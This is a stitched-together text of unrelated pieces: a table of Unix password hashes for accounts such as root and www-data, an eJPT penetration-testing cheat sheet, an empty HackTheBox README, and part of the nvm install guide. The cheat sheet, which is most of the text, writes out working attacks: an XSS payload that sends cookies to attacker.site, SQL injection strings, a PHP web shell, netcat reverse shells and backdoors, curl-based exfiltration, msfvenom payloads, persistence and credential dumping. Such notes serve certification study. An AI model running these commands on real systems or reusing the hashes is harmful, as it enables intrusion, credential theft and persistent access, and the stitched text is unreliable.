| 47. | `pi:$6$SQPHFoql$gSE5qWbZRGHDin4LnFY56sMnQsmvH/o2oIlXv.3KcqVsJCYgJ09R9/Pws88e8yjKgJnaxN3zdq8f5ots1bJcY/:17148:0:99999:7:::` |
| 48. | `postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::` |
| 49. | `puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::` |
| 50. | `reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::` |
| 51. | `robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::` |
| 52. | `robot:$6$HmQCDKcM$mcINMrQFa0Qm7XaUaS5xLEBSeP3bUkr18iwgwTAL8AIfUDYBWG5L8J9.Ukb3gVWUQoYam4G0m.I5qaHBnTddK/:16752:0:99999:7:::` |
| 53. | `root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::` |
| 54. | `root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh` |
| 55. | `root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::` |
| 56. | `root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::` |
| 57. | `root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::` |
| 58. | `root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::` |
| 59. | `root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7:::` |
| 60. | `root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7:::` |
| 61. | `root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::` |
| 62. | `root:$6$BVgS5ne0$Q6rV3guK7QQUy7uRMwbQ3vv2Y5I9yQUhIzvrIhuiDso/o5UfDxZw7MMq8atR3UdJjhpkFVxVD0cVtjXQdPUAH.:17431:0:99999:7:::` |
| 63. | `root:$6$CM3c1cdI$HbQWZlQdGEWV8yo3j7M84i1/RFK4G7fafTUIUYLWk52zm9O8KRLhqZenF8KbqsUjHlZQk4VmNEeEbBCRjOWbH0:17111:0:99999:7:::` |
| 64. | `root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::` |
| 65. | `root:$6$GpmQGQUN$8kLewzMF4ItmxezcryWqSPrXNRTH5TOQFKKkHjK2NSmrTg95xiYi.l8L.RYUL.8pAsj8s4EGvDy4dvENQIqNf.:15585:0:99999:7:::` |
| 66. | `root:$6$kdMFceEg$pk9h93tdD7IomhE7L0Y396HO6fxSM.XDh9dgeBhKpdZlM/WYxCZe7yPRNHfZ5FvNRuILVp2NOsqNmgjoSx/IN0:18012:0:99999:7:::` |
| 67. | `root:$6$L2m6DJwN$p/xas4tCNp19sda4q2ZzGC82Ix7GiEb7xvCbzWCsFHs/eR82G4/YOnni/.L69tpCkOGo5lm0AU7zh9lP5fL6A0:17247:0:99999:7:::` |
| 68. | `root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::` |
| 69. | `root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::` |
| 70. | `root:$6$n.BA4A59$WeIF0ZbaB3VGgAxUZqGHnw01.GhL9oVYYFioh07RpPtBl49YdMahhtbYhxUjanXf/NJXiCHBvrNhdC53P1UX2.:17412:0:99999:7:::` |
| 71. | `root:$6$O4bZf1Ju$0xcLPNyQkVcKT0CajZYBOTz4thlujMRjQ7XuFstUDWwYHKmVmJsDmzGXUwYbU1uqr6jxEvX4XJjSUgiwjPmEp0:17399:0:99999:7:::` |
| 72. | `root:$6$P7ElNgGp$fNzyy4OgqSR1ANJXTgbpzp4U42JXG1qJ55iNV10NVJoX5UWjtckWD0oHmcTOj0lqObyWhFu2y3udHVpHaqYxf.:17238:0:99999:7:::` |
| 73. | `root:$6$PnbVvEMS$OcseJT8lZRrgrW1JBpHJ252SPRxS6Rkh3oVBkrbRBZgHBD1wArL6FcyO5daqaon7waFKwSqbg5fIjFgzUVFMS1:18048:0:99999:7:::` |
| 74. | `root:$6$qAoeosiW$fsOy8H/VKux.9K0T3Ww2D3FPNlO5LAaFytx/6t69Q7LPDSS/nNiP4xzq0Qab.Iz3uy5fYdH3Aw/K5v3ZMhRRH0:16756:0:99999:7:::` |
| 75. | `root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::` |
| 76. | `sarah:$6$DoSO7Ycr$2GtM5.8Lfx9Sw8X1fDMF.7zWDoVoy1892nyp0iFsqh5CfmtEROtxmejvQxu0N/8D7X8PQAGKYGl.gUb6/cG210:18010:0:99999:7:::` |
| 77. | `scriptmanager:$6$WahhM57B$rOHkWDRQpds96uWXkRCzA6b5L3wOorpe4uwn5U32yKRsMWDwKAm.RF6T81Ki/MOyo.dJ0B8Xm5/wOrLk35Nqd0:17504:0:99999:7:::` |
| 78. | `service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::` |
| 79. | `setup:$6$PR5zOqWk$3MKXMgf6.4bLlznh0R87RB4qaOAcGhbE0Cs8xtUqVPHP8x0553/6aMZnfsZOWKXL0DOqUcVRkfCQN8DvjdZNc1:17086:0:99999:7:::` |
| 80. | `shelly:$6$aYLAoDIC$CJ8f8WSCT6GYmbx7x8z5RfrbTG5mpDkkJkLW097hoiEw3tqei2cE7EcUTYdJTVMSa3PALZeBHjhiFR8Ba5jzf0:17431:0:99999:7:::` |
| 81. | `smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::` |
| 82. | `SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:8ed3993efb4e6476e4f75caebeca93e6:::` |
| 83. | `susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::` |
| 84. | `sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::` |
| 85. | `togie:$6$dvOTOc6x$jpt1MVPeBsVlfkhVXl3sv21x2Ls2qle8ouv/JMdR6yNpt2nHHahrh0cyT.8PfVcNqlrAHYFkK2WYdSbxQ4Ivu1:17392:0:99999:7:::` |
| 86. | `tom:$6$ptD/.gN.$n.B/5dODEQFteBwg75Ip9leeaaXSMesGbfZzoVHpZihMHfbWu45UpVZTc6razK1JLZ6817ckZhAJF776Dg/ZJ0:17407:0:99999:7:::` |
| 87. | `user1:$6$9iyn/lCu$UxlOZYhhFSAwJ8DPjlrjrl2Wv.Pz9DahMTfwpwlUC5ybyBGpuHToNIIjTqMLGSh0R2Ch4Ij5gkmP0eEH2RJhZ0:18050:0:99999:7:::` |
| 88. | `user2:$6$7gVE7KgT$ud1VN8OwYCbFveieo4CJQIoMcEgcfKqa24ivRs/MNAmmPeudsz/p3QeCMHj8ULlvSufZmp3TodaWlIFSZCKG5.:18050:0:99999:7:::` |
| 89. | `user3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7:::` |
| 90. | `user4:$6$0pxj6KPl$NA5S/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7:::` |
| 91. | `user5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n/:18051:0:99999:7:::` |
| 92. | `user6:$6$Y9wYnrUW$ihpBL4g3GswEay/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh/5w/tQELa3LtiyTFwsLsWXubsSCfzRcao1u/:18051:0:99999:7:::` |
| 93. | `user7:$6$5RBuOGFi$eJrQ4/xf2z/3pG43UkkoE35Jb0BIl7AW/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7:::` |
| 94. | `user8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7:::` |
| 95. | `user:$6$gLVDPSY5$CGHDuEBpkC90vX2xFD9NeJC0O9XfhVj9oFVvL8XbTRpBnt/7WJFpADj0zboPTKTqPbOHafZGUd/exj4OZ1Frc/:15585:0:99999:7:::` |
| 96. | `veronica:$6$ud4650Og$j9dN4Xh6nHTDUQ5LpnrUzl6FdRiapcGvjg0JU2/Wx.G5Q.PFtbv.sa4OJyNnzTVsFEMmgnEZQV1nxGFiy56zS/:17033:0:99999:7:::` |
| 97. | `vulnix:$6$tMOyhDF2$gExhASDVWJqHYn00.A8XLJb.DvE7bdD6NffAno3iY5zEkJwZ4yDTGMrhdVbkMXV1dlBT00DoGFR7oXbtDi3lQ0:15585:0:99999:7:::` |
| 98. | `wpadmin:$6$FtTN/YPC$iidNFmRVpQ1p2kkfoOZ6OzNPqR95DQ/7G10aze2CA2W3ik/sHHyEPaNNY57tMvRDU0/Rs62FEimiKXD2VgEYC1:17096:0:99999:7:::` |
| 99. | `www-data:$6$SYixzIan$P3cvyztSwA1lmILF3kpKcqZpYSDONYwMwplB62RWu1RklKqIGCX1zleXuVwzxjLcpU6bhiW9N03AWkzVUZhms.:17264:0:99999:7:::` |
|
<p align="center">
<img width="60%" src="https://github.com/edoardottt/images/blob/main/eJPT-notes/ejpt.jpg">
</p>
> **Note**
> These are all the notes I took while following the INE course for eJPT certification, I strongly think everything you need to pass the exam is in this 'cheatsheet'.
Info about eJPT certification [here](https://ine.com/learning/certifications/internal/elearnsecurity-junior-penetration-tester-v2).
Read also my [blog post](https://www.edoardoottavianelli.it/post/post7/post7.html) about eJPT.
#### Exam setup
- Download OPVN configuration file
- `sudo openvpn file.ovpn`
- Enter username and password
- CTRL+Z
- `bg`
#### Add a route in IP routes:
Linux:
```bash
ip route <destination network> via <gateway>
```
#### Show IP addresses:
Linux:
```bash
ip addr
```
#### Show CAM table:
Linux:
```bash
ip neighbor
```
or
```bash
ifconfig
```
#### Show Listening ports (both UDP and TCP):
Linux:
```bash
netstat -tunp
```
Windows:
```bash
netstat -ano
```
#### ARP Spoofing
```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
```
```bash
arpspoof -i <interface> -t <target> -r <host>
```
To intercept the traffic between 192.168.4.11 and 192.168.4.16
```bash
arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16
```
#### Ping sweeping
```bash
fping -a -g 192.168.1.0/24 2> /dev/null
```
or
```bash
fping -a -f targets.txt 2>/dev/null
```
or
```bash
nmap -sn 192.168.1.0/24
```
or
```bash
nmap -sn -iL networks.txt
```
#### OS Fingerprinting
```bash
nmap -Pn -O <target(s)>
```
#### Port Scanning
`nmap`...Then remember:
- `-sT`: TCP Connect Scan, usually recorded in application logs
- `-sS`: TCP Syn Scan, usually not recorded in app. logs (well configured IDSs do)
- `-sV`: Version Detection Scan, TCP Connect Scan + Banner Detection
Example:
```bash
nmap -sS -p 1-100,443 192.168.1.13,14
```
Tip: Use `--reason` to show the explanation of why a port is marked open or closed
Tip: Use `--open` to show only open, open|filtered, and unfiltered ports.
TCP Quick Scan
```bash
nmap -sV -sC 192.168.1.1
```
TCP Full Scan
```bash
nmap -sV -sC -p- 192.168.1.1
```
UDP Quick Scan
```bash
nmap -sV -sU 192.168.1.1
```
Get info on a particular service:
```bash
nmap -sC -p 27017 192.168.1.13 | less
```
#### Masscan
Check if masscan is properly installed:
```bash
masscan --regress
```
Scan example:
```bash
masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24
```
If you want to use a VPN connection (configure the options properly):
```bash
masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 -e tap0 --router-ip 192.168.1.1
```
In order to save the configuration into a file:
```bash
masscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 --echo > masscan.conf
```
Use the configuration file as input:
```bash
masscan -c masscan.conf
```
#### Web Fingerprinting
Using netcat:
```bash
nc 192.168.1.2 80
HEAD / HTTP/1.1
```
Using openssl:
```bash
openssl s_client -connect target.site:443
HEAD / HTTP/1.1
```
Using httprint:
```bash
httprint -P0 -h 192.168.1.1 -s /usr/local/bin/signatures.txt
```
#### Directory/Files enumeration with dirb
Default scan:
```bash
dirb http://google.com
```
Using a custom wordlist:
```bash
dirb http://google.com /usr/share/dirb/wordlists/small.txt
```
Using cookies:
```bash
dirb http://google.com -c "COOKIE:XYZ"
```
Using Basic Authentication:
```bash
dirb http://google.com -u "admin:password"
```
Using Custom Header:
```bash
dirb http://google.com -H "MyHeader: MyContent"
```
Disable recursive enumeration:
```bash
dirb http://google.com -r
```
Set Speed delay in milliseconds:
```bash
dirb http://google.com -z 1000
```
Specify extensions:
```bash
dirb http://google.com -X ".php,.bak"
```
Save results in a file:
```bash
dirb http://google.com -o results.txt
```
#### Google Dorks
- `site:` Include only results on a given hostname
- `intitle:` Filters according to the title of a page
- `inurl:` Similar to intitle but works on the URL of a resource
- `filetype:` Filters by using the file extension of a resource
- `AND`, `OR`, `|` Use logical operators to combine your expressions
- `-` Filter out a keyword or a command's result
Example: `-inurl:(htm|html|php|asp|jsp) intitle:"index of" "last modified" "parent directory" txt OR doc OR pdf`
See also the [Google Hacking Database](https://www.exploit-db.com/google-hacking-database)
#### XSS
Payload: `<script>var i = new Image(); i.src = "http://attacker.site/log.php?q+"+document.cookie;</script>`
Server:
```php
<?php
$filename="/tmp/log.txt";
$fp=fopen($filename, 'a');
$cookie=$_GET['q'];
fwrite($fp, $cookie);
fclose($fp);
?>
```
#### SQLi
Payloads:
- `' OR 'a'='a`
- `' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a`
- `' OR substr(user(),1,1) = 'a`
- `' UNION SELECT user(); -- -`
Sqlmap:
- `sqlmap -u 'http://victim.site/view.php?id=1141' --cookie "PHPSESSID=m42ba4etbktcktvjadirnsqqg4;`
- `sqlmap -u 'http://victim.site/view.php?id=1141' -p id --technique=U`
- `sqlmap -u 'http://victim.site/view.php?id=1141' --banner`
- `sqlmap -u 'http://victim.site/view.php?id=1141' -v3 --fresh-queries`
- `sqlmap -u 'http://victim.site/view.php?id=1141' --users`
- `sqlmap -u 'http://victim.site/view.php?id=1141' --dbs`
- `sqlmap -u 'http://victim.site/view.php?id=1141' --tables`
- `sqlmap -u 'http://victim.site/view.php?id=1141' -D <db-name> -T <table-name>`
- `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db <db-name> --columns`
- `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db <db-name> --dump`
- `sqlmap -u 'http://victim.site/login.php' --data='user=a&pass=a' -p user --technique=B --banner`
- `sqlmap -r post-vuln-sqli.txt -p user --technique=B --banner`
Tip: Dump only the data you're interested in, not the whole database. Dumping a lot of data using SQLi is very noisy and a heavy process.
#### Misconfigured PUT method
```bash
wc -m payload.php
20 payload.php
```
```bash
nc victim.site 80
PUT /payload.php HTTP/1.1
Host: victim.site
Content-type: text/html
Content-length: 20
<?php phpinfo(); ?>
```
#### Uploading PHP shell
```php
<?php
if (isset($_GET['cmd']))
{
$cmd = $_GET['cmd'];
echo '<pre>';
$result = shell_exec($cmd);
echo $result;
echo '</pre>';
}
?>
```
#### Authentication Cracking with Hydra
- `hydra -U http-post-form` (get info on a module)
- `hydra -L users.txt -P passwords.txt <service://server> <options>`
- `hydra crackme.site http-post-form "/login.php:user=^USER^&pwd=^PASS^:invalid credentials" -L users.txt -P passwords.txt -f -V`
- `hydra 192.168.1.2 ssh -L users.txt -P passwords.txt -f -V`
#### Authentication Cracking with nmap
- `nmap -p 22 --script ssh-brute --script-args userdb=/root/users.txt demo.ine.local`
#### Authentication Cracking with metasploit
- `use auxiliary/scanner/ssh/ssh_login`
- `set RHOSTS demo.ine.local`
- `set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt`
- `set STOP_ON_SUCCESS true`
- `set verbose true`
- `exploit`
#### Password cracking using John the Ripper
- `unshadow /etc/passwd /etc/shadow > crackme.txt`
- `john --incremental -users:<users-list> crackme.txt` (bruteforce, don't use it!)
- `john --show crackme.txt`
- `john --wordlist=<wordlist-filename> crackme.txt`
- `john --wordlist=<wordlist-filename> --rules crackme.txt` (enable word mangling)
#### Cracking Password of Microsoft Word file using John the Ripper
- `/usr/share/john/office2john.py MS_Word_Document.docx > hash`
- `john --wordlist=passwds.txt hash`
#### Password cracking using Hashcat
- `hashcat -m 0 -a 0 -D2 example0.hash example.dict` (m = 0 is MD5)
- `hashcat -m 0 -a 0 -D2 example0.hash example.dict -r custom.rule`
#### Windows Shares
Interesting shares:
- `\\ComputerName\C$` lets an administrator access a volume (C$, D$, E$...)
- `\\ComputerName\admin$` points to the Windows installation directory
Enumerating shares (Windows):
- `nbtstat -A 192.168.1.11`
- `net view 192.168.1.11`
- `net use \\192.168.1.11\IPC$ '' /u:''` (null session attack)
- `enum -S 192.168.1.11` ([enum](https://packetstormsecurity.com/search/?q=win32+enum&s=files))
- `enum -U 192.168.1.11`
- `enum -P 192.168.1.11`
Enumerating shares (Linux):
- `nmblookup -A 192.168.1.11`
- `smbclient -L //192.168.1.11 -N`
- `smbclient //192.168.1.11/IPC$ -N` (null session attack)
- `enum4linux -n 192.168.1.11`
- `enum4linux -P 192.168.1.11`
- `enum4linux -S 192.168.1.11`
- `enum4linux -s /usr/share/enum4linux/share-list.txt 192.168.1.11`
- `enum4linux -a 192.168.1.11`
- `smbmap -H demo.ine.local`
- `nmap -sU -sV -p137,138 demo.ine.local`
- `nmap -script=smb-enum-shares -Pn 192.168.1.11`
- `nmap -script=smb-enum-users -Pn 192.168.1.11`
- `nmap -script=smb-brute -Pn 192.168.1.11`
- `nmap --script smb-vuln-* -Pn 192.168.1.11`
- `python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.1.11`
#### Metasploit
```bash
msfconsole
```
```bash
show -h
```
```bash
search <keyword(s)>
```
```bash
use <path-to-exploit>
```
```bash
show options
```
```bash
set <option-name> <option-value>
```
```bash
exploit
```
Tip: Use `show payloads` when an exploit is selected to show only the available payloads for that exploit
Tip: Use `info` when an exploit is selected to get information about the exploit
Tip: Use `back` when an exploit is selected to return to unselect it
#### Meterpreter
Inside metasploit:
- `search meterpreter`
- `set payload <payload-path>`
- `background`
- `sessions -l` (list the sessions)
- `sessions -i <session-id>` (resume a background session)
- `sysinfo`
- `ifconfig`
- `route`
- `getuid`
- `getsystem`
- You can use Unix-like commands like `pwd`, `ls`, `cd`...
- `download <filename> <location>`
- `upload <filename> <location>`
- `shell`
- `hashdump`
- `run autoroute -h`
- `run autoroute -s 192.130.110.0 -n 255.255.255.0 ` (pivoting towards that network)
Tip: `help` shows an amazing list of available commands divided by category
Tip: If `getsystem` fails, use `use exploit/windows/local/bypassuac`
Tip: `ps -U SYSTEM` shows only the processes with SYSTEM privileges
Tip: Use `post/windows/gather/hashdump` to dump the passwords DB and save it for an offline cracking session
#### Pivoting with Meterpreter
Let's say we have compromised a machine using metasploit and we have a meterpreter shell with session id 1. We discover that there is another machine but it's reachable only from the compromised machine.
Our IP: `192.180.40.2`
Compromised host: `192.180.40.3`
Unreachable machine: `192.130.110.3`
- `meterpreter > run autoroute -s 192.130.110.0 -n 255.255.255.0 1`
- `background`
- `msf > route`
If we want to scan the `192.130.110.0/24` network we can use:
```
msf > use auxiliary/scanner/portscan/tcp
msf > set PORTS 80, 8080, 445, 21, 22, ...
msf > set RHOSTS 192.130.110.1-254
msf > exploit
```
If we discover that at least one port is open and we want to target a specific port on a specific host (e.g. `192.130.110.3:21`) we can use:
- `sessions 1` (back to meterpreter session)
- `portfwd add -l 1234 -p 21 -r 192.130.110.3` (forwarding remote machine port 21 to the local machine port 1234)
- `portfwd list`
- `background`
Then if we want to scan the service we can use nmap:
```bash
msf > nmap -sS -sV -p 1234 localhost
```
#### Reverse shell with Netcat
Attacker:
```bash
nc -lvp 8888 -e /bin/bash
```
Target (the IP of the attacker):
```bash
nc -v 192.168.1.1 8888
```
#### Generate a reverse shell payload with msfvenom
```bash
msfvenom --list payloads | grep <keyword>
```
```bash
msfvenom -p php/reverse_php lhost=192.168.0.58 lport=443 -o reverse.php
```
```bash
msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.0.58 lport=443 -f elf -o reverse443
chmod +x reverse443
```
Note: If you have generated a meterpreter payload shell, you have to use meterpreter in order to receive back the connection
#### Blind Remote Code Execution
Target (Use the Attacker IP)
```bash
curl http://192.168.1.130:53/`whoami`
```
or
```bash
curl http://192.168.1.130:53/`id | base64`
```
Attacker:
```bash
nc -lvp 53
```
Tip: You can also create a reverse shell with `msfvenom` and let the target download it
#### Enumerating users history with meterpreter
- `background`
- `use post/linux/gather/enum_users_history`
- `set SESSION 1`
- `exploit`
#### Data exfiltration with Netcat
Receiver:
```bash
nc -lvnp 8888 > received.txt
```
Sender (the IP of the receiver):
```bash
cat message.txt | nc -v 192.168.1.1 8888
```
#### Backdoor using ncat
Victim:
```bash
ncat -l -p 5555 -e cmd.exe
```
Attacker (the IP of the victim):
```bash
ncat 192.168.1.66 5555
```
#### Reverse Backdoor using ncat
Attacker:
```bash
ncat -l -p 5555 -v
```
Victim (the IP of the attacker):
```bash
ncat -e cmd.exe 192.168.1.66 5555
```
Tip: For persistent reverse backdoor use the registry key `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
#### Reverse Backdoor using Metasploit
```bash
msfconsole
use exploit/windows/local/s4u_persistence
show options
sessions
set session <session-id>
set trigger logon
set payload windows/meterpreter/reverse_tcp
set lhost <local-ip>
set lport 1234
exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost <local-ip>
set lport 1234
exploit
sysinfo
ps
help
```
Tip: once we get a shell we can use `screenshot` to get a picture of what the victim is seeing on the Desktop
Tip: once we get a shell we can use `download filename location` to save the filename in the specified location on our machine
Tip: Same syntax as above but use `upload` to upload files
Tip: Use `getsystem` to gain the highest privilege (i.e. SYSTEM) on the compromised machine and `getuid` to check if it actually worked.
#### Upgrading a simple shell
```bash
bash -i
```
```bash
python -c 'import pty; pty.spawn("/bin/sh")'
```
#### Maintaining access using Metasploit (Windows)
Inside a meterpreter session:
- `background`
- `use exploit/windows/local/persistence_service`
- `show options`
- `set SESSION <session-id>`
- `exploit`
Use the backdoor:
- `background`
- `sessions -K`
- `use exploit/multi/handler`
- `set PAYLOAD windows/meterpreter/reverse_tcp`
- `set LHOST <your-ip>`
- `set LPORT 4444`
- `exploit`
Note: The `<session-id>` is the one you can read when you type `background`
Note: We need to use the same information about the backdoor to receive a new meterpreter session on the multi-handler. We can't change Payload, IP or Ports details.
#### Pivoting using a SOCKS Proxy
You have access to a compromised host and only from there you can access another machine. That machine exposes a web server, in order to access it from your computer set up a SOCKS proxy.
Add the route to the unreachable network using autoroute or route.
```bash
msf > use auxiliary/server/socks_proxy
msf > set VERSION 4a
msf > set SRVPORT 9050
msf > run -j
```
```bash
root@INE:~# proxychains nmap ...
```
Then you can also setup firefox in order to send request using the SOCKS proxy v4 at `127.0.0.1:9050`.
#### Dump AutoLogin stored credentials
Inside a meterpreter session:
- `migrate -N explorer.exe`
- `background`
- `use post/windows/gather/credentials/windows_autologin`
- `set SESSION <session-id>`
- `exploit`
----------
If you find an error, just [open an issue](https://github.com/edoardottt/eJPT-notes/issues).
**Don't** text/mail me looking for exam solutions.
|
#### This github repo is for my Hackthebox writeups.
<!-- ## Welcome to GitHub Pages
You can use the [editor on GitHub](https://github.com/F41zK4r1m/HackTheBox/edit/gh-pages/index.md) to maintain and preview the content for your website in Markdown files.
Whenever you commit to this repository, GitHub Pages will run [Jekyll](https://jekyllrb.com/) to rebuild the pages in your site, from the content in your Markdown files.
### Markdown
Markdown is a lightweight and easy-to-use syntax for styling your writing. It includes conventions for
```markdown
Syntax highlighted code block
# Header 1
## Header 2
### Header 3
- Bulleted
- List
1. Numbered
2. List
**Bold** and _Italic_ and `Code` text
[Link](url) and ![Image](src)
```
For more details see [GitHub Flavored Markdown](https://guides.github.com/features/mastering-markdown/).
### Jekyll Themes
Your Pages site will use the layout and styles from the Jekyll theme you have selected in your [repository settings](https://github.com/F41zK4r1m/HackTheBox/settings/pages). The name of this theme is saved in the Jekyll `_config.yml` configuration file.
### Support or Contact
Having trouble with Pages? Check out our [documentation](https://docs.github.com/categories/github-pages-basics/) or [contact support](https://support.github.com/contact) and we’ll help you sort it out. -->
|
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.8-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684)
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
## Table of Contents
- [Installation](#installation)
- [Install script](#install-script)
- [Verify installation](#verify-installation)
- [Important Notes](#important-notes)
- [Git install](#git-install)
- [Manual Install](#manual-install)
- [Manual upgrade](#manual-upgrade)
- [Usage](#usage)
- [Long-term support](#long-term-support)
- [Migrating global packages while installing](#migrating-global-packages-while-installing)
- [Default global packages from file while installing](#default-global-packages-from-file-while-installing)
- [io.js](#iojs)
- [System version of node](#system-version-of-node)
- [Listing versions](#listing-versions)
- [.nvmrc](#nvmrc)
- [Deeper Shell Integration](#deeper-shell-integration)
- [zsh](#zsh)
- [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file)
- [License](#license)
- [Running tests](#running-tests)
- [Bash completion](#bash-completion)
- [Usage](#usage-1)
- [Compatibility Issues](#compatibility-issues)
- [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux)
- [Docker for development environment](#docker-for-development-environment)
- [Problems](#problems)
- [Mac OS "troubleshooting"](#mac-os-troubleshooting)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
## Installation
### Install script
To install or update nvm, you can use the [install script][2] using cURL:
```sh
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
```
or Wget:
```sh
wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
```
<sub>The script clones the nvm repository to `~/.nvm` and adds the source line to your profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).</sub>
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
```
You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables.
Eg: `curl ... | NVM_DIR=/usr/local/nvm bash` for a global install. Ensure that the `NVM_DIR` does not contain a trailing slash.
<sub>*NB. The installer can use `git`, `curl`, or `wget` to download `nvm`, whatever is available.*</sub>
**Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type:
```sh
command -v nvm
```
simply close your current terminal, open a new terminal, and try verifying again.
**Note:** On OS X, if you get `nvm: command not found` after running the install script, one of the following might be the reason:-
- your system may not have a [`.bash_profile file`] where the command is set up. Simply create one with `touch ~/.bash_profile` and run the install script again
- you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry.
If the above doesn't fix the problem, open your `.bash_profile` and add the following line of code:
`source ~/.bashrc`
- For more information about this issue and possible workarounds, please [refer here](https://github.com/creationix/nvm/issues/576)
### Verify installation
To verify that nvm has been installed, do:
```sh
command -v nvm
```
which should output 'nvm' if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary.
### Important Notes
